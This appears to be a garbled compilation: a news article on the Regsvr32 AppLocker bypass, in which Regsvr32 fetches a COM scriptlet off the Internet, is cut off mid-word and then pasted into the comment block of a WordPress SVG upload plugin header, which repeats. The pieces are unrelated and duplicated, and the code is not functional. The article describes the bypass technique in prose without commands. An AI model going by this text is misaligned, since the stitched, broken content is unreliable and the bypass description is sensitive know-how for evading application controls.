(v) vadyua

## Windows AppLocker Bypass Allows Attackers to Registers DLLs Off the Internet.txt
Clever hackers can bypass Microsoft's Windows AppLocker security feature by abusing a hidden trait of the Regsvr32 command-line utility that's normally used to register DLLs on a Windows computer.

AppLocker is a security feature introduced with Windows 7 and Windows Server 2008 R2 that helps administrators specify which users or group of users are allowed to access and run files on a per-file basis.

Regsvr32 is a scripting utility that can be used by installers or in batch scripts to quickly register a DLL. As you'd imagine, Microsoft has neutered such a dangerous tool in order to prevent abuses by allowing administrator privileges to run.

Attacks are impossible to detect
According to security researcher Casey Smith, an attacker that has a foothold on an infected Windows workstation can abuse Regsvr32 to download a COM scriptlet (.sct file) off the Internet and run it to register a DLL on the local machine.

The attacker won't need admin privileges, Regsvr32 is proxy aware, can work with TLS content, follo

## lc-svg-upload.php
<?php
/*
Plugin Name: SVG Upload
Plugin URI: http://www.lewiscowles.co.uk
Description: Super PHP Plugin to add Full SVG Media support to WordPress, I should live in {$webroot}/wp-content/plugins/ folder ;)
Author: Lewis Cowles
Version: 1.5.8
Author URI: http://www.lewiscowles.co.uk/
*/
	Clever hackers can bypass Microsoft's Windows AppLocker security feature by abusing a hidden trait of the Regsvr32 command-line utility that's normally used to register DLLs on a Windows computer.

	AppLocker is a security feature introduced with Windows 7 and Windows Server 2008 R2 that helps administrators specify which users or group of users are allowed to access and run files on a per-file basis.

	Regsvr32 is a scripting utility that can be used by installers or in batch scripts to quickly register a DLL. As you'd imagine, Microsoft has neutered such a dangerous tool in order to prevent abuses by allowing administrator privileges to run.

	Attacks are impossible to detect
	According to security researcher Casey Smith, an attacker that has a foothold on an infected Windows workstation can abuse Regsvr32 to download a COM scriptlet (.sct file) off the Internet and run it to register a DLL on the local machine.

	The attacker won't need admin privileges, Regsvr32 is proxy aware, can work with TLS content, follo
	<?php
	/*
	Plugin Name: SVG Upload
	Plugin URI: http://www.lewiscowles.co.uk
	Description: Super PHP Plugin to add Full SVG Media support to WordPress, I should live in {$webroot}/wp-content/plugins/ folder ;)
	Author: Lewis Cowles
	Version: 1.5.8
	Author URI: http://www.lewiscowles.co.uk/
	*/